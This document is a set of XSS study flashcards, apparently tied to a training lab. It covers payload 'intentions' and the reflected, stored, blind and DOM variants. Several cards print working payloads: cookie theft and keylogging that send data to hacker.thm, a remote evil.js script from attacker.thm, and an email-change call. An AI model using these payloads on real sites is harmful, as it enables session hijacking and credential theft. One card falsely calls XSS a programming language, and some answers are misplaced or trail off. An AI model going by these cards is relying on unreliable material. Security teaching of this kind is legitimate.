Cross-Site Scripting Flashcards
What is Cross-Site Scripting?
Cross-Site Scripting, also known as XSS, is a type of injection attack where the attacker injects malicious JavaScript code into a web application that is then executed by other users.
What is XSS?
XSS is a programming language that's based off of JavaScript.
Whats an XSS payload?
An XSS payload is the JavaScript that you wish to be executed by the target user.
What are the 2 parts of an XSS payload?
The 2 parts of an XSS payload are The Intention and The Modification.
What is the purpose of The Intention?
The Intention is what we actually want the javascript code to do.
What is the purpose of The Modification?
These are the actual changes that we make to the JavaScript to make it execute.
What are some examples of Intentions?
Some examples include: Proof of Concept, Session Stealing, Key Logging, and Business Logic.
What is Proof of Concept?
This is the simplest form of payload, where all you're really doing is trying to confirm whether or not you can achieve XSS; normally this is done in the form of a pop-up with a message.
What would a payload for Proof of Concept look like?
<script> alert('XSS Payload'); </script>
What is Session Stealing?
Details of a user's session, such as login tokens, are often kept in cookies on the target machine; there's JavaScript code that can take those target cookies, encode them to ensure successful transmission, and post them to a hacker-controlled website to be logged.
What does a payload for Session Stealing look like?
<script> fetch('http://hacker.thm/steal?cookie=' + btoa(document.cookie)); </script>
What is a Key Logger?
Anything that you type on a website with an established XSS will be forwarded to a website under the hacker's control.
What does the payload for a Key Logger look like?
<script> document.onkeypress = function(e){ fetch('https://hacker.thm/log?key=' + btoa(e.key)); } </script>
What is Business Logic?
This is a much more specific form of XSS, mostly targeting key staff in business positions; it's basically just executing a JS function or calling a network resource.
Whats an example of Business Logic?
A good example to think about would be a JS function that's used for changing the user's email address, called user.changeEmail().
What would a payload for this actually look like?
<script> user.changeEmail('attacker@hacker.thm'); </script>
What is Reflected XSS?
Reflected XSS happens when user-supplied data is included in the webpage source without any validation.
What’s an example of Reflected XSS?
Say the user enters an incorrect input into the website and an error message is displayed. If you check the source code of the error, you'll find that the message was built from the error parameter of the request. Now say that the application doesn't check the contents of the error parameter, allowing the attacker to insert malicious code into the error.
Can you write an example of this in practice?
<div>
<p>'Invalid Input'</p>
</div>
after injection:
<div>
<p><script src=https://attacker.thm/evil.js></script></p>
</div>
Simply remove the contents of the <p> tag and replace them with the XSS script.
What is Stored XSS?
As the name suggests, the XSS payload is stored on the web application (in a database, for example) and then gets executed only after another user visits the application.
What is Blind XSS?
Blind XSS is basically the same as Stored XSS, in that it's stored on a web application for another user to view; however, in this instance you won't be able to see the payload work or test whether it works.
Whats an example of Blind XSS?
Let's say a website has a contact form where you can message a member of staff; often these messages that you send to staff aren't checked for malicious code, which allows the attacker to enter anything that they want. These messages will then get turned into support tickets.
What does DOM stand for and mean?
DOM stands for Document Object Model and is a programming interface for HTML and XML documents. Through it, a webpage is represented as a document, and that document can be viewed in a browser or as its HTML source.
What is DOM Based XSS?
DOM Based XSS is where the JavaScript execution happens directly in the browser without any new pages being loaded or data being submitted to backend code.
Whats an example of Stored XSS?
Look at a blog website or any other site that allows its users to submit comments; unfortunately, a lot of these applications won't filter the user-submitted comments for malicious code. These comments will be saved in the site's database and then run when other users view the comment or visit the site.
What are the consequences of this on the user?
The biggest issue here is that it's possible for the attacker to end up hijacking the staff member's session.